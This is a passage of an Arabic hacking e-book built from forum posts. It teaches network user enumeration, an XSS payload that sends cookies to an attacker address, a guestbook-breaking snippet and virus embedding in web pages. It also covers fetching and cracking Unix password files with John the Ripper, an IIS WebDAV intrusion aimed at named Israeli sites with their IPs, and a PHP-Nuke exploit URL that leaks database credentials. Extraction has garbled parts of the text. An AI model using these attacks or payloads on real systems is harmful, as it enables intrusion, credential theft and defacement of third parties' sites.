الخطوه الولى هي التعرف على مدىaswind.COMطيب لنفرض اننا ودنا نخش على شركه معينه باسم الخاصه بهذه الشركه وهذا سهل ipعنوان

INTERNIC.NETاول شي انصح بالتسجيل في موقع حتى يعطونك خدمات تستاهل

هناك طريقتين لمعرفه الي بي اول INTERNIC.NETعن طريق الموقع

والثانيه عن طريق برنامج الدوس بالمر :

NSLOOKUPSET TYPE = ALL

aswind.COMراح تطلعلك المعلومات هذي بالضبط :

Domain Name: ASWIND.COM

264

Page 265: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

Registrar: ONLINENIC, INC.Whois Server: whois.OnlineNIC.com

Referral URL: http://www.onlinenic.com/Name Server: DNS.ASWIND.COMName Server: NS1.ASWIND.COM

Updated Date: 01-apr-2002

DNS = 2 وضعت ارقام الملقامات الخاصه بaswind.comمعنا الكلم هذا ان شركه يعني همDNS وسوت لها نشر يعني هناك على القل سيرفرين شغالين بخدمه DNS خادم 2يعني عدد

DNSيتعتقدون ان الموضوع ماراح ياخذ كثير من طاقه التشغيل للجهزه خاصه

بمعنى ان العمليه تصير واسعه شوي DNSهنا في مجال للدخول وتعديل بيانات لكن لنفترض انه فيه اكثر منaswind.com فقط مثل ماسوو Ipفقط قم بنشر عنوانين من عنواوين

مثل .6عنوان لنفول على اجهزه قديمه وبطيئهDNS للنشر ووضع خوادم IPعشان كذا اقترح على الشركات وضع عنواونين

على جهازDNS وخدمه WIN2K دايناميكي وهذا يعني انك تقوم بتشغيل DNSلنك اساسا في حاجه ل DNSواحد وهذي من الفكار الجيده في نظري اذا وضعت جهاز خاص فقط بال

وبما انك في بدايه هجوم هذا يعني انه عندك متسع منDNSطيب لنفرض انك مالقيت شي على اجهزه وصدقوني فيه ادواتHowISالوقت اذن قم بتجريب جميع العناوين المتوفره لديك والتي حصلت عليها من

موجوده في شبكه معينه IPموجوده بالنت مممكن انها تمسح مجموعه

استطعت انك تحصلIP لكل عنوان NetBios يوجود فيه اسم LMHOSTSطيب قم بعمل ملف اسمه عليه

باسمLMHOSTS سو لك ملف 200.200.200.0 وعنوانها Cيعني انت عرفت ان الشبكه من كلس NetBios وملف باسم N2 = 200.200.200.2 وهكذا بعدين تحتاج عمل Net view

//servername لكل اسم من N1 إلى N254يعني كانك تسوي سكان بورت بس بطريقه ثانيه 254 إلى جهاز رقم 1من جهاز رقم

وبالنسبه للجهزه الصحيحه سوف تشتغل الخدمه فيها ام العناوين الغير متصله فلن تستجيب طبعا

طيب انت ال الن ماتقدر تسوي شي \ موجود وال ل او تم تغييره او اذا هناك يوزر نيم بنفسAdministratorبس تقدر تتاكد من حساب

الصلحيات انت بطبيعه الحال ماتقدر تحصل عليه بسهوله اذن هناك ابواب خلفيه للحصول عليه من بعض الطرق الوصول لبعض اسماء المستخدمين الموجودين في

لنها تطنشهم ههههههههه مدري ليش Windwosالشركه وهذا يعتبر عيب من عيون فيه امر تقدر تعرف من خلله بس أل الن انت ماتقدر تسويه لنه مالك حق وصول مباشر يعني انت لزم

وهوnet user لي يوزر موجود في المجال المر هو username and passwordتحصل على يستعرضلك جميع المستخدمين الموجودين بالمجال

لكن فيه طريقه للحصول على اسماء بالهبل ههههههه كيف ؟؟

الن عندما يقوم مستخدم بتسجيل دخول يقوم جهازه ليس فقط بتسجيل اسمه فقط بل اسم جهازه يعني على سبيل المثال مدير الشبكه اذا صار عنده زحمه يشغل خدمه اسمها مراقبه النظام حتى يعرف انه وصل للحد

القصى بتسجيل اسم المستخدم كاحدMessenger Serviceعندما يقوم مستخدم بتسجيل الدخول تقوم خدمه

الموجودين في الشبكه الي انت اساسا جالس تبحث عنهم وعلى افتراض انك دخلت علىNetBiosاسماء nbtstat -a 200.200.200.200 فأن اي شخص اذا قام بعمل IP 200.200.200.200خادم بعنوان

او ل ( سوف اتحدثMSBROWSERسيتكمن من معرفه اسم جهازك واسم المستخدم واذا كان جهازك عنها بالتفصيل )

موجود في الشبكه فانك اذا قمتIP 200.200.200.50 ورقم Johnطيب لنفرض ان فيه شخص باسم واسم جهازهjohn راح يضهرلك انه فيه شخص باسم Nbtstat -a 200.200.200.50بعمل

265

Page 266: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

johnPC )طيب وش نسوي Administratorالن موجود معك اسم مستخدم ( احتمال يكون

؟

في جهزك ( ولن يتم تسجيل اسمك في النطاق يعني بتخشMessenger Serviceقوم بتعطيل خدمه مخفي )

nbtstat -a اذا شفتها بعد عمل المر MSBROWSERوبالسنبه ل هذا يعني انه استعراض رئيسي للمجال وهذا من اكبر الخطاء التي يقومون بها مدراء الشبكات لن مراقب

المجال يدوخ ل يستطيع التجميع وتستطيع استغلل مثل هذه الثغرات دائما في الشبكات الداخليه طيب انت الن حصلت على اسم المتسخدم

انت محتاج كلمه المرور وهذي هي المشكله يعني انت ضميت جهازك مع الشبكه لكن ماقدرت تحصل على او متحسس الشبكه ( معليش ماني متاكد من السبيلنقnt senstiverكلمه المرور لكن تقدر تحصل عليها

. (طيب كيف اقدر احصل فعليا على كلمه المرور

غالبا ماتكون كلمات مرور المستخدمين تاففه جدا هاذ اذا وجدت اصل يحل لك المشكله.l0pthcrackيعني برنامج مثل

انتهى،،،

266

Page 267: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

"Cross Site Scripting"

<منقول من منتدى الحلم>>tcp<الكاتب:

المتطلبات :

معرفة تامه بلغة

HTML

اطلع غير متعمق على لغات السكربتينق وهي

JAVASCRIPT ,PERL ,CGI ,VBSCRIPT

ومن وجهة نظر شخصية المصايب كلها من الجافا سكربت والهتمل

===============================================================================================

الهداف المنشوده :

* افهام القارئ عن الكيفية التى يتم فيها سرقة معلومات هامه من جهاز المستخدم

او المجلت من البهب نيوك اوYaBB and UBB او VBULLETIN* اختراق المنتديات من نوع بوست نيوك

*افهام القراء عن الكيفية التي تتم فيها سرقة الكوكيز او اختطاف الجلسة من المستخدمين

* ان يستطيع القارئ توسيع مداخل الختراق

================================================================================================

جمله عرضية :

الختراق ليس ال تشغيل للمخ واستغلل لشياء لها فائده وارجو من يقرا هذا الموضوع بان يحاول التعود

على مسألة القراءة والترجمه ثم يلجأ الى التطوير ويترك عنه مسألة المطامر من منتدى لمنتدى او

267

Page 268: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

المواقع التي تطرح الثغرات المنية ...هل نحتاج الى امة تطور نفسها .. ام نطور انفسنا نحو المية

================================================================================================

المشكلة :

كما هو معروف فان مستعرضات الوب مثل الكسبلورر او نت سكيب ... الخ تاتي مترجمات النصوص اوالسكربتات

مبنية داخلها ويتم ترجمة السكربتات على جهاز المستخدم فلو اننا طلبنا صفحة كان بها سكربت معين

فان المستعرض يترجم هذا السكربت ويظهره على نفس الصفحه المطلوبه .

اما بالنسبة للمنديات او مجموعات النقاش فانها ترفض مثل هذه السكربتات وتعتبرها خرق للخصوصية

او قد تستغل في اغراض سيئة لسرقة معلومات حساسة من المستخدمين

المثال التالي يوضح كيفية ادراج السكربت :

Hello FOLKS board. This is a message.

>SCRIPT>malicious code</SCRIPT<

This is the end of my message.

تم ادرجها او حقنها في بين علمتي السكربت وقد تحتوي على كود خبيثmalicious codeان كلمة

يسرق او يرسل بيانات ... الخ لذلك فان مصمموا برامج المنتديات ومطوروا يمنعونها ال اذا مكنها الدمن

مثل يتم ادراج السكربت مكان خاصية المجHTMLاو المصمم او قد يتم استخدامها اذا مكن المنتدى تفيل

>script>document.write('<img src="http://my_ip_address/'+document.cookie+'">';</script<

او قد يستطيع السكربت ان يكتب على شكل رابط في صفحة او يرسل لك بالبريد او يرسل لك عن طريقالمسنجر

والمثال التالي يوضح لك كيفية عمل رابط في صفحة

>A HREF="http://example.com/comment.cgi? mycomment=<SCRIPT>malicious code</SCRIPT>"> Click here</A<

انظر هنا وركز في كيفية عمل الكود انها فقط عندما يصلك باحد الطرق المذكوره اعله وتضغط عليه سينفذالسكربت

سكربت يرسل ملحظاتك لصاحب الموقع او قد يكونcomment.cgiوللشرح اكثر لنفرض ان السكربت سكربت للبحث

268

Page 269: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

ياخذ المدخلت او الملحظاتmycommentفي الموقع او المنتدى وهو يحتوي على متغير داخله اسمه التي تكتبها

فلو اعتبرناه انه سكربت بحث ويولد صفحات ديناميكية ناتجه من البحث ستكون النتائج وخيمة فبدل ان

ينتج الصفحات الحيوية او النشطه سينتج مايطلبه السكربت منه لحظ الفكره هنا فقد ضمن السكربت داخل

حقل نصي فبدل من ان ياخذ الحقل النصي نصوص استخدم ليأخذ اوامر من السكربت .

لحظ المثال التالي :وحتى اعقد المور اكثر

>A HREF="http://example.com/comment.cgi? mycomment=<SCRIPT SRC='http://bad-site/badfile'></SCRIPT>"> Click here</A<

هنا استخدم نفس السكربت السابق لكن هذه المره طوره اكثر ليكون مستخدما في ادراج ملف من موقع اخروالذي

ولن مصدر البيانات ادخل فيه عدة مصادر اخرى عن طريق السكربت المذكور فأنBADFILEهو بالسم هذا الهجوم

او الترجمه من عندي " برمجة عبور الموقع " لننا عبرنا باستخدامcross-site scriptingيسمى ب برمجة

وهيCSSالسكربتات اكثر من موقع واذا كنت تلحظ في السيكيورتي فوكس او المواقع المنيه تختصر ب اختصار

وليس ل cross-site scriptingل

CASCADE style sheetsاي اوراق النماط المتتالية

قد يدخل بدل الوسم او علمة السكربت اي من الوسوم التالية

>SCRIPT>, <OBJECT>, <APPLET>, and <EMBED<

وبنفس الفكار السابقة يمكن تنفيذHTML> من وسوم formومن الممكن ان يكون هناك وسم النماذج <الوامر

منها لسرقة الكوكيز او بيانات اخرى او توجيهك لصفحات اخرى

اذا كنت قرات ماكتبته عن التكويد السداسي عشر واليونيكود تستطيع الن ان تفهم ما اقصده

=========================================================

ولمزيد من التفاصيل :

http://www.cert.org/advisories/CA-2000-02.html

http://www.perl.com/pub/a/2002/02/20/css.html

269

Page 270: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

انتهى،،،

كود تدمير سجل الزوار ""

<ةةةةة ةة ةةةةةةة ةةةةةةة><ةةةةةة: ةةةةةةة>

كود صغير جدا بحجمه,كبير بقدرته على تدمير سجل الزوار بالكامل...انتم تعرفون طبعا كيفية عمل توقيع في سجل الزوار,السم- اليميل- موقعك الشخصي-تقديرك للموقع- طريقة الستدلل......والنقطه المهمه وهي

كتابة تعليقك على الموقع؟؟؟؟؟؟؟

نحن سوف نضع كل شي حسب ما هو مطلوب ولكن عندما نأتي لكتابة التعليق...........نقف ونكتب: . . . . . . . . . . . ..

هذا هو الكود : ==================================================

=h3>put your text here<xmp><plaintext--><

==================================================

270

Page 271: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

....وهذا كل شي ....بعد توقيعك اعملput your text hereيمكنك كتابة اي شي تريد في مكان ريفريش وانظر ماذا حصل

ملحظه: =====

الكود ل يعمل مع بعض انواع سجل الزوار؟!

انتهى،،،

وضع فايروس في صفحة ""

<ةةةةة ةة ةةةةة ةةةةة>>Dr^FunnY <ةةةةةة:

والثالث معاينة htmlاختار صفحة جديدة ... هاتلقي تحت ثلث مربعات الول عادي والثاني انت خليك في العادي

اختار ادراج ثم اختار مكون ويب..... هايطلعلك جدول صغير من خانتين ... خليك في الخانة الولى اللي على اليمين

واختار منها ااخر اختيار اللي هو "عناصر تحكم متقدمة" اضغط ضغطه واحده وهايظهرلك عناصر في الخانه " ... هايفتحلك مربع تاني... انت عليك تحط في المربعHTMLاللي على اليسار اختار اول اختيار اللي هو "

ده كود الفيرس وتضغط موافق :) وكده الطبخة استوت . واوعى تضغط على معاينة الصفة وانت معندكش نورتن لكن لو عندك هايديك تحذير بوجود فيروس

الطريقه للي عنده فرونت بيج عربي واللي عنده انجليزي هي نفس الخطوات مع تغيير السامي.

انتهى،،،

271

Page 272: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

" الثغرااات "

<ةةةةة ةة ةةةة ةةةةةة>

Exploitاسثمار = ثغرة = الجزء المهم:

استغللها للحصول على ملف الباسوورد وقاعدة الثغرات هي أخطاء برمجية في نظام التشغيل ويمكنكالبيانات وووو..إلخ

أول يجب أن تجمع كل المعلومات الممكنة حول الموقع :- المنافذ المفتوحة مثل الف تي بي والتلنت مثل وهذ عن طريق برامج مثل1

super scan ابحث عنه في النترنت.

- معرفة نظام تشغيل الموقع ويندوز أم لينوكس وغيرها والفائدة من ذلك أن كل نظام له ثغراته الخاصة به2واسم المجلد الذي به ملف الباسوورد يختلف من نظام تشغيل لخر.

لمعرفة نظام التشغيل إذهب إلى الموقعwww.netcraft.net

واكتب الموقع ثم إنتر..!!.! وستعرف بعض المعلومات عن الموقع كليبي ونظام التشغيل...إلخ- معرفة كل مايقدمه الموقع من خدمات كالبريد وغير ذلك3- معرفة البرامج المثبتة على الموقع مثل المنتديات وبرامج السي جي آي4

أنواع الثغراتأبسط النواع هي التي يمكن الوصول إليها عن طريق المتصفح مثل

www.thesite.com/....../والنواع الباقية أو الستثمارات :

plثغرات مكتوبة بلغة بيرل *. ويمكن استخدامها في لينوكس أو في ويندوز إذا كان لديك برنامج

Active Perlثغرات بلغة سي

.*cيمكن استخدامها في لينوكس فقط ثغرات بلغة شل

.*shويمكن استثمارها في لينوكس فقطويمكنك إيجاد الكثير من النواع السابقة الخاصة بلينوكس فيمواقع الثغرات وإليك بعضها

www.securiteam.comwww.securityfocus.com

www.ukrt.f2s.comwww.ussrback.com

www.packetstorm.securify.com

272

Page 273: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

www.secureroot.comwww.rootshell.com

أما ثغرات المتصفح يمكنك الكشف عنها بالبرامج الموجودة في قسم البرامج. ويمكنك من خلل البرامج الموجودة على السيرفر كالمنتديات أو برمجيات بيرل وسيجي آي أن تبحث عن

ثغرات لها في مواقع الثغرات أو المواقع السابقة.وبرمجيات بيرل وسي جي آي قد تكون كتاب زوار أو محركبحث أو حتى عداد زوار

shadowedحسنا لنفرض أنك حصلت على ملف الباسوورد..المشكلة أن كلمةالسر تكون بداخله مضللة .encryptionأو مشفرة

مثال لملف باسووردroot:x:0:1:Super-User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin:

sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer Admin:/usr/spool/lp: smtp:x:0:0:Mail Daemon User:/: uucp:x:5:5:uucp

Admin:/usr/lib/uucp: nuucp:x:9:9:uucp ولن ملف الباسوورد يحتوي على كلمات سر الشخاص المرخص لهم بدخول الموقع قد ل بزيد عن عشرة

أسطر وقد يصل آلف السطر...وقد تختلف..xكلمات السر السابقة مضللة وهي علمة

أما المشفرة والتي سنحصل عليها تكون هكذا:root:x:0:1:Super-User:/:/sbin/sh مضللة

root:Q71KBZlvYSnVw:0:1:Super-User:/:/sbin/sh مشفرةrootأو الجذر اسم المستخدم =

xكلمةالسر ولكنها مضللة = وباقي السطر غير مهم

لذا عليك أن تبحث عن ملف آخر يحوي كلمة السر shadowedفي الغلب ستكون كلمة السر مضللة مشفرة يسمى ملف الشادو

shadow file ويوجد في أماكن معينة تختلف باختلف نظام التشغيل

tokenالرمز الذي يعبر عن الباسوورد =

Linux : /etc/shadow token* = SunOS : /etc/shadow token* يأخذ أشكال متعدده اشهرها هو =

FreeBSD : /etc/master.passwd or /etc/shadow token والجديد هو * = xIRIX : /etc/shadow token = x

AIX : /etc/security/passwd token! = ConvexOS : /etc/shadow or /etc/shadpw token* =

مثال لملف شادوroot:EpGw4GekZ1B9U:11390:::::: bin:NP:6445:::::: sys:NP:6445::::::

adm:IyEDQ6VoRlLHM:10935:::::: #admin:9z8VMm6Ovcvsc:10935:::::: lp:NP:6445::::::

نجد أن كلمة السر هي EpGw4GekZ1B9U

كيف تفك التشفير؟ عن طريق برامج مخصصة لذلك أفضلها تجده في صفحة برامج الثغرات

John the ripperوهو يقوم بتجريب كل المحاولت الممكنة حتى يحصل على الباسوورد .

وعليك x مفكرة مثل وعليك وضع الكلمة المشفرة بدل من ال ولكن يجب أن تضع له الباسووردات في ملفترتيبها بحيث يكون كل حساب في سطر

طريقة تشغيله:إذهب إلى الدوس واكتب

john passwd وضعتها هو الملف الذي به الباسوورد المشفرةpasswdحيث

273

Page 274: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

سيظهر :by Sola 97,John the Ripper Version 1.3 Copyright (c) 1996

Loaded 1 password

**v: 0 c: 6401 t: 0:00:00:01 99% c/s: 6401 w: *****DONEوإذا أردت معرفة الباسوورد التي يخمنها الن اضغط انتر

والباسوورد الصحيحة ستحفظ في ملف في نفس المجلد الذي به البرنامج اسمهjohn.pot

وإذا أردت القيام بعملية كسر أخرى عليك إلغاء الملف أو تغيير اسمه .

انتهى،،،

شرح شبه مفصل عن الثغرات ""

<ةةةةة ةة ةةةةة ةةةةة> >icer<ةةةةةة:

الموضوع اليوم ينقسم الى التالي : كيف تجد اكسبلويتات ؟1كيف تستعمل الكسبلويتات ( دعونا نسميها استثمارات ) ؟2 انواع مختلفه من الستثمارات ...3 مواقع مفيده للبحث عل الثغرات ...4

×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××

a face at the interface: الستثمارات تستخدم عاده لكي تحصل عل الرووت عل نظام معين ..و الرووت هو عباره

عن الدمينيستراتور او مدير النظام الذي تريد اختراقه ...الستثمارات دايما ما توجد بصوره طبيعبه ..httpبواسطه ملف معين يجعك تستطيع الدخول بواسطه ال

لبحث عن هذا الستثمار ....يو جد العديد من الستثمارات مثلscannerلذلك نستخدم BOF (buffer over flow) , DoS ( denial of service , (

هي اكسبلويت ...DoSو على فكره انا ا اؤمن ان ال هجوم ال و يوجد ايضا الثغرات التي تتيح لك تنفيذ بعض الوامر مثل عرض و مسح و الكتايه على الملفات

مث الكستينشنز و غيرها ....بالنسبه لموضوع البوفر اوفر فلو فهو يشبه الى حد كبير حيث يعتمد على ارباك السيرفير بفيض من المعلومات و يمنحك الرووت .DoSال

ال السيرفير مما يؤدي الGET / POST فهو عباره عن ارسال DoSاما هجوم ال لوحده المعالجه المركزيه للسيرفير (اللي هو عباره عن جهاز يعملOVERLOADحدوث

....OFFLINE ساعه ) فيتوقف الموقع عن العمل و يصبح السيرفير 24××××××××××××××××××××××××××××××××××××××××××××××××××

×××××××××××××××××××××××××××××

كيف تجد استثمارات ؟1لكي تستطيع ان تستثمر ثغره معينه في سيرفير فانه يجب عليك اول ان تتاكد ان الثغره موجوده في السيرفير

و لما كان الستثمار عباره عن فايل معين ..فانه يوجد طريقتين لمعرفه ما اذا كانت الثغره موجوده ام ل.. اما عن طريق التطبيق مباشره من خلل المتصفح كما في حاله بعض ثغرات امتصفح مثل اليونيكود او

الفرونت بيج او ان تستخدم السكانرز في فحص الموقع ..طبعا من المعروف ان ثغرات المتصفح لها سكانرز ال

threads بعضها ممكن ان تضيف له ملفات بها ثغرات و البعض الخر يكونcgi scanersو هي تسمى ال

جاهزا ..

274

Page 275: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

>>>shadow security scanerو هناك نوع اخر من السكانرز و ان احبذه ... و هوrootshell.com.....على فكره من احسن المواقع التي يمكن ان تجد بها احدث الثغرات هو

يحتوي على و سوف تجدred hat 7.2محرك بحث يكفي ان تضع مفتاح للبحث عباره عن كلمه واحده او كلمتان مثل

العديد من الثغرات التي تحتوي علىred hat 7.2......

××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××

كيف تستغل هذه الثغرات ؟؟2 ) و يطلع لهم استثمارات معينه ..لshadowالكثير من الناس عندما يفحصون موقع بسكانر (و خاصه ال

يعرفون ايش يسوون بعد كذا؟؟؟؟...

بجانب الثغره ..تزرو العنوان ده و تقره كل كلمه تلقيها هناك ..urlلو انت بتستعمل الشادو حتلقي rootshell.com في السكانرز الخرى يبقى تاخد اسم اثغره و تروح الموقع urlاو اذا لم تجد اي

% من الحالت بتلقي استثمار لهاي الثغره..99و تكتب في محرك البحث اسم الثغره و انت ان شاء ال في و كيف تستخدمها و اشياء زي كده .......

×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××

انواع مختلفه من الستثمارات :3طبعا الكثير من الستثمارات يكون هدفها هو منحك الرووت على السيرفير ..معنى كلمه رووت هو المدير

اللي الرووت يكتبها ..اي لك كل الصلحيات علىcommandsاو الدمين .. ل يوجد اي قيود على ال السيرفير

وBOF , و ال httpو الحصول على الرووت يمكن ان يتم من خلل العديد من الثغرات مثل ثغرات ال غيرها ..

كها تعتمد على طريقه عمل الثغرات .. فهي قد تعطي لك صلحيه قراءه و حذف و الكتابه عل الملفات و ايضارفع ملفات الى السيرفير ....

او مشفرهconfig.incاو قد تعطي لك الكلمه السريه و اسم اليوزر اما في صوره واضحه مثل الملف بمقياس

DES/MD5/ كما في الملف ... etc/passwd... في انظمه اليونيكس .... و لكنه ل يسبب ضرر للسيرفير مثلما يسببهDoSبالنسبه للبفر اوفر فلو فهو يشبه الى حد كبير هجوم ال

المهم انه في اغلب الحيان يكون البفر عباره عن ارسال اوامر للسيرفير تنتهي دائماDoSهجوم الباعطائك

صلحيه الرووت ... و هذا بسبب استقبال السيرفير لكم هائل من الداتا فيؤدي الى ارباك السيرفير ..

×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××

مواقع مفيده للبحث عن الثغرات من خللها :4يمكنك البحث عن الستثمارات الجديده في هذه المواقع :

packetstorm.securify.com /.securityfocus.com /www.insecure.org www.rootshell.com/.(: و غيرها ابحث سوف تجد المزيد

انتهى،،،

275

Page 276: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

كيف تستخدم الثغرات ""

<ةةةةة>>oOoDa BE$T <ةةةةةة:

البداية:

. :txt ويعني ملف ملف نصي..من الممكن اي يحتوي على سورس كود لبعض الثغرات او البرامج المكتوبة بالسي

, البير..اكمل القراءة لتعرف كيفية استخدامها..

. :c هو برنامج سي لكنه سورس كود فقط..واغلب الثغرات يتم كتابتها بالسي..هذا يفترض عليك

) _وهذا يعني تحويل السورس كود لملف (برنامج)_ ثم تثومcompileعليك تحميله ثم عمل ( اوLinuxبتشغيله...لكن المشكلة هنا انه لن يمكن تشغيلها تحت بيئة ويندوز..فيجب ان يكون عندك

Shell Account.. بعض التحميل توجه للمسار الموجود به المفل ثم اكتب:

gcc filenmae.cامر الكومبايل >---- سينتج الملف:

a.out..وهو البرنامج الناتج >---

والن ماذا ينقصك؟؟يجب ان يكون معك اي بي او اسم الموقع الذي تريد ان تطبق عليه الثغرة..

كمثال:/.a.out xxx.xxx.xxx.xxx

للثغرات المكتوبة بالبيرل:

. :pl Shell Account او Linuxبرنامج بيرل..لتشغيله ايضا تحتاج

واردت ان تطبقه على موقع اكتب:exploitاذا كان perl filename.pl xxx.xxx.xxx.xxx

او/.filename xxx.xxx.xxx.xxx

276

Page 277: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

انتهى،،،

" تمتع بإختراق المواقع السرائيلية مع هذه الثغرة "

<منقول من منتديات شبكة الحزم>>DeadLine <الكاتب:

الشرح : اول الثغره يا أخوان تطبق على سيرفرات :

Microsoft-IIS/5.0 on Windows 2000

وانني ل اعلم ان كانت النسخ الخرى تمتلك مثل98يا أخوان كل مانحتاجه هي اداه بسيطه يقدمها لنا وندوز فقط :98هذه لخاصيه ام ل لنني اعمل على نظامين فقط لينكس ماندريك ووندوز

Web Foldersالداه هي :

اين نجد هذه الثغره : حسنا سوف نجدها انشاءل في الخطوات التاليه :

My Computerادخل على

فقط يعني تكون هي مع السيMy Computerثم ستجدها هناك ليس داخل السي او شيء آخر بل داخل والدي الى آخره

Web Foldersنفتح يا أخون الملف المسمى

ثم سنجد التي :

Add Web Folder حيث هي التي ستكون اداتنا المهمه للختراق

: Add Web Folderنفتح ال

Type the location to addحيث نجد كلمة

ونرى تحتها مستطيل نقوم بأدخال التي :

http://hostname.com/

277

Page 278: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

هو ايبي الموقع انتبه قلنا ايبي الموقع وليس السم hostnameحيث ان والجميع يعرف كيف يخرج اليبي تبع الموقع وهناك دروس كثيره بخصوص هذا الموضوع

وهذه مواقع اسرائيليه للتطيبق حيث انها تعمل على ايبي موحد : mail.talcar.co.il

daihatsu-israel.co.ildaewoo-israel.co.il

ندخل بالمستطيل الذي تم ذكره : http://192.117.143.121/

Nextثم نضغط على كلمة :

وهنا سوف تعمل الداه بتحميل ملفات الموقع وتعطيك خاصية الدمن وهي تحميل وازالة الملفات

finishفبعد ان ينتهي البرنامج من التحميل تظهر لك كلمة :

وتجد ملف الموقع هناك ومسمى تحت ايبي الموقع Web Folderعندها تذهب الى ال :

موقع اخر للتطبيق :

http://www.israwine.co.il/ 212.199.43.84

ملحظه : اذا تم طلب ادخال باسوورد ويوزر نيم فأعرف ان الثغره مغلقه او اذا دخلت الى الملفات ولم تجد اي ملف فمعناه ان الثغره مغلقه ايضا

اسئل ال التوفيق والعافيه اللهم امين اللهم امين.

انتهى،،،

278

Page 279: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

" ثغرة نيوك "

<ةةةةة> <Arab VireruZ<ةةةةةة:

الشرح بالنقليزية :

twlc: here your 0day from LucisFero and supergatePosted on Monday, September 24 @ 14:25:58 CDT

topic: advisories twlc security divison

24/09/2001

Php nuke BUGGED.

Found by:LucisFero and supergate

/.twlc

SummaryThis time the bug is really dangerous...it allows you to 'cp' any file on

the box... or even upload files ...

Systems Affectedall the versions ARE vulnerable

except '5.0 RC1' (i wonder why a released c. is ok while the final 5.2 is bugged(

ExplanationDo you need sql password?

http://www.server.net/admin.php?upload=1&file=config.php&file_name=hacked.txt&wdir=/images/&userfil

e=config.php&userfile_name=hacked.txt

279

Page 280: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

the admin 'login' page will be prompted just go to http://www.server.net/images/hacked.txt and you will see config.php that

as everyone knows contain the sql's passwords, you can even upload files...i leave you the 'fun' to find all the ways to use it... and try to dont be a SCRIPT KIDDIE we wrote this advisory to help who runs php nuke

and NOT TO LET YOU HAVE FUN.

let me explain you the bug... admin.php contains this routine :$basedir = dirname($SCRIPT_FILENAME;($textrows = 20;$textcols = 85;$udir = dirname($PHP_SELF;(

if(!$wdir) $wdir;"/"=if($cancel) $op="FileManager;"

if($upload} (copy($userfile,$basedir.$wdir.$userfile_name ;(

$lastaction = ""._UPLOADED." $userfile_name --> $wdir;" //This need a rewrite -------------------------------------> OMG! WE TOTALY

AGREEEEEEEE lmao//include("header.php;("//GraphicAdmin($hlpfile;(//html_header;()//displaydir;()$wdir2;"/"=

chdir($basedir . $wdir2;(//CloseTable;()//include("footer.php;("

Header("Location: admin.php?op=FileManager;("exit;

{

that doesnt do a check to see if you are logged as admin or no... so you can use it anyway...

Solutionwe erased the function... cause we wanted to remove the file manager

anyway but i suggest you to do the same... -to upload files use FTP-

conclusions:yet another bug of php nuke... this software is used by thousands of people... (we run something based on it too) i hope that this time the

author will reply soon and will release a patch too! as i said before just dont try to be a script kiddie or we simply WONT post anymore this kind of advisories. Prolly the funny thing is that who first discovered the bug

was LucisFero that... 2 hours before didnt knew php ... so i (supergate) fear him and you should too.

posted at:http://www.twlc.net article http://www.twlc.net/article.php?sid=421

[email protected]

280

Page 281: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

http://www.phpnuke.org -good luck-http://sourceforge.net/tracker/?group_id=7511 Project: PHP-Nuke Web

Portal System and of course mailed to the author of php nuke

contacts (bugs, ideas, insults, cool girls... remember that trojans are directed to /dev/null:(

[email protected]@twlc.net

http://www.twlc.net (yes we are patched(

peace out pimps. bella a tutti.

eof

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=Arab VireruZ-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=

الخطأ البرمجي:

$basedir = dirname($SCRIPT_FILENAME;($textrows = 20;$textcols = 85;$udir = dirname($PHP_SELF;(

if(!$wdir) $wdir;"/"=if($cancel) $op="FileManager;"

if($upload} (copy($userfile,$basedir.$wdir.$userfile_name ;(

$lastaction = ""._UPLOADED." $userfile_name --> $wdir;" //This need a rewrite -------------------------------------> OMG! WE TOTALY

AGREEEEEEEE lmao//include("header.php;("//GraphicAdmin($hlpfile;(//html_header;()//displaydir;()$wdir2;"/"=

chdir($basedir . $wdir2;(//CloseTable;()//include("footer.php;("

Header("Location: admin.php?op=FileManager;("exit;

{=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=Arab VireruZ-=-=-=-=-=-=-=

=-=-=-=-=-=-=-=-=-=-=الثغرة:

http://www.server.net/admin.php?upload=1&file=config.php&file_name=hacked.txt&wdir=/images/&userfil

e=config.php&userfile_name=hacked.txt

281

Page 282: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=Arab VireruZ-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=

الثغرة بعد التعديل

http://www.server.net/admin.php?upload=1&file=config.php&file_name=ultramode.txt&wdir=/&userfile=co

nfig.php&userfile_name=ultramode.txt

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=Arab VireruZ-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=

عمل الثغرة:

لن تحتاج تحميل ملفultramode.txt الى الملف النصي الموجودconfig.php-=طبع ملف الكونفيج نصي لطبع الملف

